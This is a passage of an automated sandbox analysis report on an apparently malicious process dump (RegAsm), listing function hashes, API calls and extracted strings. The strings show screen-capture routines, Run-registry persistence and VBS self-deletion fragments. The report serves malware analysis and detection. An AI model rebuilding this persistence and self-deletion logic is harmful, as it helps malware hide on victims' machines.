                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                                                                                                                                                                                  Function 004381E8 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                                                                                  • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                                                                                                                                                                                  Function 0043797E Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                                                                  • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                                                                                                                                                                                  Function 00437566 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                                                  • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                                                                                                                                                                                  Function 0041DBF3 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                                                                                                                  • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                                                                                                                                                                                  Function 0043E11C Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                                                                  • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                                                                                                                                                                                  Function 0043DEED Relevance: .2, Instructions: 214COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                                                                  • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                                                                                                                                                                                  Function 00427C40 Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                                                                                                                                                  • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                                                                                                                                                                                  Function 004387F0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                  • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                                                                                                                                                                                  Function 00418EB1 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                                                                                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                                                                                                                  • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                                                                                                                                  • GetIconInfo.USER32 ref: 00418FF8
                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                                                                                                                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                                                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                                                                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                                                                                  • String ID: DISPLAY
                                                                                                                                                                                                  • API String ID: 4256916514-865373369
                                                                                                                                                                                                  • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                                                                                                  • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                                                                                                                  Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                  • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                                                                  • API String ID: 1861856835-1447701601
                                                                                                                                                                                                  • Opcode ID: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
                                                                                                                                                                                                  • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                                                                                                                                  Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                                                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                                                                                                                                  • API String ID: 3797177996-2483056239
                                                                                                                                                                                                  • Opcode ID: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
                                                                                                                                                                                                  • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                                                                                                                                  Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                                                                                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                                                                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                                                                                                                                  • API String ID: 2649220323-436679193
                                                                                                                                                                                                  • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                                                                                                                                  • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                                                                                                                                  Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                                                                                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                                                                                                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                                                                                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                                                                                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                                                                                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                                                                                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                                                                                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                                                                                                  • API String ID: 738084811-2094122233
                                                                                                                                                                                                  • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                                                                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
